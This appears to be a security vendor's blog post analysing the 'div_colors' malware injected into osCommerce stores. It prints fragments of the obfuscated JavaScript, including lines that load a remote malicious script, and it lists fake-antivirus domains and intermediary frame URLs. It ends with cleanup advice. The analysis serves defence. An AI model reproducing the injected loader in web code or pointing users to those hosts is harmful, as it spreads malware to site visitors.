The “div_colors” Malware Update

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:

if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {
..


As you can see, it looks like a valid JavaScript and that’s what is confusing a lot of people. In fact, what it does is load a new (and malicious) JavaScript element from an external web site, as you can see here:

var new_cstyle=document.createElement("script”);
new_cstyle..type="text/javascript”;
new_cstyle..src=div_pick_colors(div_colors,0);
document.getElementsByTagName("head”)[0]. appendChild(new_cstyle);

Where is it lloading the malicious code from?

Right now, it is loading from http://tongho.co.th/engine/, but a few hours ago, it was using a different domain name, and it changes every few hours! The code is also mutating, and every infected site has a backdoor to load the new variation every once in a while.

This is a list of the some of the domains used so far:

http://tongho.co.th/engine/

againstvirusxpsoft.com
antiagencyxpsoft.com
antivirixpsoft.com
antivirusxpeasy.com
antivirusxphard.com
antivirusxpinfected.com
antivirusxpsoftcentral.com
antivirusxpsoft.com
antivirusxpsoftonline.com
egyptantivirusxp.com
infectedvirusxpsoft.com
myantivirusxpsoft.com
myxpscanantivirus.com
protestersantivirusxp.com
protestersantivirusxpsoft.com
protesterscanantivirus.com
protesterscanantivirusxp.com
protestersscanantivirus.com
protestersvirusxpsoft.com
scanantivirixp.com
theantivirusxpsoft.com
thexpscanantivirus.com
webantivirusxpsoft.com
webxpscanantivirus.com
xpexamineantivirus.com
xpscanagainstvirus.com
xpscanantiagency.com
xpscanantibacteria.com
xpscanantiviri.com
xpscanantiviruscentral.com
xpscanantivirus.com
xpscanantivirusonline.com
xpscanantivirusprotesters.com
xpscanwarvirus.com
xpseeantivirus.com

As you can see by the common domain names, it is trying to push the infamous fake AV.

Here is the frame created by the first intermediary, which is also changing:

<frame src ="http://86.55.140.203/index2.php" ..
<frame src="http://solomon-vl.cz.cc/show.php?key=fcfe7c10d4f05fa29b45456408269fdc&u=..

It’s a very complex malware, and every osCommerce user needs to make sure their site is secure. The file_manager.php file needs to be removed, and the admin directory renamed and protected. We also recommend our security scanner to verify if a site is infected. If it is, we can take care of it for you.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.